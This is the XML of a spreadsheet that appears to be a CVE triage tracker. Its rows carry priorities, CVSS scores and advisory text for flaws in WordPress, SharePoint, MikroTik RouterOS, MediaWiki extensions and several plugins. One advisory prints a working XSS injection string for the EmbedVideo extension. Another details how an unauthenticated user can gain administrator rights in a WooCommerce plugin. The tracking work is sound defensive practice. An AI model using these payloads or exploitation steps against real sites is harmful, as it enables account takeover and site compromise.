      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in chillzhuang SpringBlade up to 5.0.2. This affects the function UserServiceImpl.userInfo of the file blade-service/blade-system/src/main/java/org/springblade/system/service/impl/UserServiceImpl.java of the component user-auth-info Endpoint. This manipulation of the argument userId causes authorization bypass. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. CVE-2026-56100 and CVE-2026-36765 are distinct issues. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97368</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97648</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function. Performing a manipulation results in cross-site request forgery. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97648</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97650</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function echo of the file admin/fun/addLog.php. The manipulation of the argument reason/detail leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97650</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97649</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is an unknown functionality of the file example_lite.sql. Executing a manipulation can lead to use of default credentials. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97649</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57440</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="inlineStr"/>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>composer:starcitizenwiki/embedvideo</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr">
        <is>
          <t>4.1.0</t>
        </is>
      </c>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr"/>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>### Summary
With $wgEmbedVideoRequireConsent disabled (not the default), the urls for videos are passed into an iframe src attribute without sanitization. When given a malformed url or id, the src attribute can be escaped via double quotes, allowing for html/javascript injection.
### Details
The iframe assembled [here](https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/blob/a573a16d925ee0ea0d34b360856dc8ab0b88f822/includes/EmbedService/EmbedHtmlFormatter.php#L204-L208) adds the url from `getUrl()` as the src without sanitization.
The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for double quotes to be introduced.
### PoC
Using double quotes, the src attribute can be escaped.
```
&lt;embedvideo service="archiveorg" id='a" onmouseover="alert(document.domain)" data-x="'&gt;&lt;/embedvideo&gt;
```
### Impact
When $wgEmbedVideoRequireConsent = false, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57440</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61823</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="inlineStr"/>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>composer:code16/sharp</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>9.22.5</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr"/>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>### Impact
A Stored Cross-Site Scripting (XSS) vulnerability exists in the rich text editor due to improper sanitization of the srcdoc attribute on &lt;iframe&gt; elements.
While the underlying Symfony HtmlSanitizer correctly HTML-encodes special characters inside the attribute value (e.g., converting &lt;script&gt; to &amp;lt;script&amp;gt;), the HTML specification mandates that browsers automatically decode HTML entities inside attribute values before processing them. As a result, any encoded JavaScript inside a srcdoc attribute is evaluated and executed as live HTML/JS in the context of the iframe when the page is rendered.
An attacker with permissions to edit an Editor field can inject malicious scripts to target other users viewing the content. Potential impacts include:
- Session Hijacking (stealing admin session cookies via document.cookie)
- Account Takeover &amp; Privilege Escalation (e.g., a low-privileged editor triggering actions as an Administrator)
- Admin panel data theft
### Patches
The vulnerability has been patched in version v9.22.5.
The fix explicitly removes srcdoc from the list of allowed iframe attributes in `src/Utils/Sanitization/FormatsSanitizedValue.php`.
### Workarounds
Users who cannot upgrade immediately can manually sanitize all content of editor fields to strip `srcdoc` attributes.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61823</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61825</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="inlineStr"/>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>composer:code16/sharp</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>9.22.5</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr"/>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>### Impact
The vulnerability allows an attacker to bypass the HTML sanitizer by using the `data-html-content` attribute in the content of a `SharpEditorFormField`. 
### Patches
The field must now explicitly configure `SharpFormEditorField::RAW_HTML` in the toolbar to keep this behavior. **When using the  `RAW_HTML` button, the application using `code16/sharp` must sanitize manually the content coming from the field**. 
Vulnerability has been patched in version 9.22.5.
### Workarounds
Sanitize every contents of editors manually (e.g. using Symfony/HtmlSanitizer)</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T34"/>
  <conditionalFormatting sqref="E2:E3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34">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Added to KEV</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87902</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>wordpress:core</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr"/>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>WordPress Core contains a remote file inclusion vulnerability which could allow an unauthenticated attacker to make page-template resolution include a chosen readable local `.php` file outside the active theme directories, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87902</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65660</t>
        </is>
      </c>
      <c r="D3" s="5" t="inlineStr"/>
      <c r="E3" s="5" t="inlineStr"/>
      <c r="F3" s="5" t="inlineStr"/>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Microsoft SharePoint contains a code injection vulnerability which could allow an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65660</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67279</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr"/>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Mikrotik RouterOS contains an improper enforcement of behavioral workflow vulnerability that could allow an unauthenticated client to open a session channel and send an exec request. This vulnerability can be chained to achieve unauthenticated exploitation of CVE-2026-86060.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67279</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T4"/>
  <conditionalFormatting sqref="E2:E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4">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Added to KEV</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87902</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>wordpress:core</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr"/>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>WordPress Core contains a remote file inclusion vulnerability which could allow an unauthenticated attacker to make page-template resolution include a chosen readable local `.php` file outside the active theme directories, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87902</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65660</t>
        </is>
      </c>
      <c r="D3" s="5" t="inlineStr"/>
      <c r="E3" s="5" t="inlineStr"/>
      <c r="F3" s="5" t="inlineStr"/>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Microsoft SharePoint contains a code injection vulnerability which could allow an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65660</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67279</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr"/>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Mikrotik RouterOS contains an improper enforcement of behavioral workflow vulnerability that could allow an unauthenticated client to open a session channel and send an exec request. This vulnerability can be chained to achieve unauthenticated exploitation of CVE-2026-86060.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67279</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T4"/>
  <conditionalFormatting sqref="E2:E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4">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3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CVE-2026-100382</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Wikimedia Foundation Mediawiki - ExternalData Extension allows OS Command Injection.
This issue affects Mediawiki - ExternalData Extension: from * before 3.7.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100382</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100075</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/srpt: Fix srpt_alloc_rw_ctxs() unwind counters
When srpt_alloc_rw_ctxs() fails partway through a multi-buffer indirect
descriptor, the unwind path destroys RDMA contexts but leaves stale
n_rw_ctx and n_rdma values (and a dangling rw_ctxs pointer). Later
sq_wr_avail accounting in srpt_queue_response() or srpt_write_pending()
can then subtract the wrong number of send queue credits.
Reset the counters and clear rw_ctxs after freeing the heap
allocation before returning an error.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100075</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14281</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>The Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 4.8.6. This is due to missing permission enforcement on the publicly accessible REST route `POST /wp-json/wawp/v1/signup/&lt;op&gt;` and the absence of a key allowlist in the `finish_registration_logic` function, which copies the attacker-controlled `wawp_custom_fields` parameter directly into `update_user_meta()` — allowing sensitive meta keys such as `wp_capabilities` and `wp_user_level` to be set by the caller. This makes it possible for unauthenticated attackers to register a new account with the administrator role and gain full administrative access to the site. When OTP verification is enabled at signup, the OTP session token (`otp_transient`) is returned in plaintext in the HTTP response body, and the `handle_magic_link_request()` handler marks that token as verified on any unauthenticated GET request containing it without ever checking the OTP code value — making the OTP step trivially bypassable with no inbox or SMS access required.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14281</t>
        </is>
